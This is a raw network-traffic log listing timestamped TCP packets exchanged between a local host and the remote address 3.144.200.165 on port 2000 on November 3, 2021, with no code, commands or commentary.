Nov 3, 2021 14:44:38.966018915 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966025114 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.966043949 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966070890 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966082096 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.966097116 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966125965 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966125965 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.966152906 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966180086 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966185093 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.966206074 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966232061 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.966233969 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966259956 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966280937 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.966286898 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966312885 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966340065 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966348886 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.966367960 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966384888 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.966392994 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966420889 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966447115 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966460943 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.966474056 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966492891 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.966500998 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966526985 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966553926 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966569901 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.966583967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966609001 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:38.966615915 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:38.966655970 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.010654926 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.010727882 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.010884047 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.012686014 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.012732983 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.012772083 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.012809038 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.012842894 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.012868881 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.012923956 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.012927055 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.013032913 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.117758989 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.117796898 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.117816925 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.117836952 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.117861986 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.117886066 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.117911100 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.117937088 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.117963076 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.117984056 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.117986917 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118010044 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118033886 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118058920 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118083000 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118109941 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118118048 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118124962 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118141890 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118165970 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118191957 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118191957 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118216038 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118241072 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118254900 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118268967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118292093 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118318081 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118341923 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118343115 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118369102 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118382931 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118393898 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118418932 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118443012 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118451118 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118469954 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118490934 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118494987 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118520975 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118545055 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118546009 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118570089 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118596077 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118622065 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118630886 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118648052 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118674040 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118683100 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118699074 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118721962 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118742943 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118747950 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118772984 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118782043 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118798018 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118814945 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118823051 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118849039 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118853092 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118875027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118901968 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118908882 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118926048 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118952036 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118974924 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.118977070 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.118999958 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119024038 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119029999 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119050026 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119062901 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119076014 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119100094 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119122028 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119124889 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119148970 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119173050 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119184017 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119199038 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119221926 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119224072 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119246006 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119263887 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119271040 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119293928 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119313955 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119318962 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119343996 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119366884 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119368076 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119390011 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119409084 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119414091 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119438887 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119462967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119465113 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119487047 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119512081 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119518995 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119534969 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119560003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119568110 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119585037 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119607925 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119611025 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119637966 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119647980 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119663954 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119688988 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119713068 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119714022 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119738102 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119762897 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.119764090 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.119792938 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.159091949 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.159131050 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.159148932 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.159173012 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.159300089 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.161016941 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.161043882 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.161067009 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.161089897 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.161093950 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.161112070 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.161134958 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.161142111 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.161158085 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.161181927 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.161205053 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.161205053 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.161226988 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.161250114 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.161257029 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.161271095 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.161300898 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.212579012 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.271219015 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271264076 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271341085 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271365881 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271390915 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271416903 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271441936 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271456003 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.271467924 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271496058 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271522045 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271545887 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.271547079 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271573067 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271598101 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271625042 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.271625042 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271651983 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271677971 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271697044 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.271703959 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271729946 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271754980 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271780014 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271787882 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.271806002 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271831989 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271857023 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271882057 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271907091 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271908045 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.271931887 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271958113 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271982908 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.271984100 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272007942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272033930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272053003 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272058964 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272083998 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272109985 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272120953 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272135973 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272161961 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272181988 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272186041 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272209883 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272222042 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272233009 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272258043 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272269011 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272280931 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272305965 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272315025 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272329092 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272355080 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272362947 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272380114 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272406101 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272418976 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272429943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272453070 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272464037 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272478104 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272502899 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272511005 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272528887 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272556067 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272561073 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272582054 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272607088 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272612095 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272631884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272659063 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272663116 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272684097 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272710085 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272711039 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272737026 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272757053 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272763014 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272788048 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272800922 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272814989 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272840023 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272874117 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272880077 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272901058 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272927046 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272945881 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.272950888 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272975922 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.272989988 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.273000956 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273026943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273051977 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273052931 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.273077965 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273097992 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.273102999 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273129940 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273145914 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.273154020 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273185968 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273188114 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.273211002 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273233891 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273235083 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.273261070 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273287058 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273307085 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.273313046 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273336887 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273364067 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.273370981 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.273423910 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.307432890 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.307475090 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.307498932 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.307523966 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.307542086 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.307549953 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.307574034 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.307575941 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.307602882 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.307621002 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.307627916 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.307655096 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.307671070 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.309320927 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309359074 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309385061 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309411049 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309433937 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.309437990 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309464931 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309474945 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.309490919 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309516907 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309535980 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.309541941 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309567928 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309582949 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.309592962 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309617996 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.309643030 CET	49766	2000	192.168.2.4	3.144.200.165
